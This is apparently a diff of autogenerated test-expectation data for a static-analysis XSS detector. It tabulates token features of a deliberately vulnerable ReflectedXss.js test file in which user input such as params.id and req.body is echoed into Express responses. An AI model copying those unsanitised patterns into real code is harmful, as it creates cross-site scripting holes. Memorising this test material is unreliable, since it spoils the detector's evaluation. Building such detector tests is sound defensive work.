enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:1:18:1 | return of function moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:10:16:21 | moreBadStuff | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:23:16:28 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:16:31:16:33 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:5 | res | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:5 | res | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:5 | res | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:10 | res.send | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:10 | res.send | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:10 | res.send | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | exceptional return of res.sen ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | res.sen ... ams.id) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | res.sen ... ams.id) | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | res.sen ... ams.id) | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:3:17:40 | res.sen ... ams.id) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:7:17:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:7:17:10 | send | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:7:17:10 | send | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:7:17:10 | send | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:7:17:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:27 | "Unknown user: " | stringConcatenatedWith | -endpoint- params.id | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19580,12 +132138,62 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | enclosingFunctionName | moreBadStuff | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:12:17:39 | "Unknow ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:36 | params | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:36 | params | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:36 | params | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:36 | params | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:36 | params | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:31:17:39 | params.id | stringConcatenatedWith | 'Unknown user: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:38:17:39 | id | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:38:17:39 | id | contextSurroundingFunctionParameters | (params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:38:17:39 | id | enclosingFunctionBody | params res res send Unknown user: params id | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:38:17:39 | id | enclosingFunctionName | moreBadStuff | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:17:38:17:39 | id | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:10 | marked | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:10 | marked | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:10 | marked | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:10 | marked | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked ... arked") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked ... arked") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:5:20:30 | marked ... arked") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:20 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:20 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:20 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | exceptional return of require("marked") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | exceptional return of require("marked") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | exceptional return of require("marked") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | require("marked") | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | require("marked") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:14:20:30 | require("marked") | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:20:22:20:29 | "marked" | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:3 | app | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:3 | app | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:7 | app.get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:21:7 | app.get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:1:24:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:5:21:7 | get | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:5:21:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:5:21:7 | get | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | calleeImports | express | @@ -19593,6 +132201,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:9:21:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | marked | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | marked | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | marked | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | marked | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | marked | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | this | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | this | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:21:21 | this | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | 'arguments' object of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | exceptional return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | calleeImports | express | @@ -19600,6 +132228,61 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | return of anonymous function | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | return of anonymous function | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:22:24:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:31:21:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | enclosingFunctionBody | req res res send req body res send marked req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:21:36:21:38 | res | enclosingFunctionName | app.get#functionalargument | +| 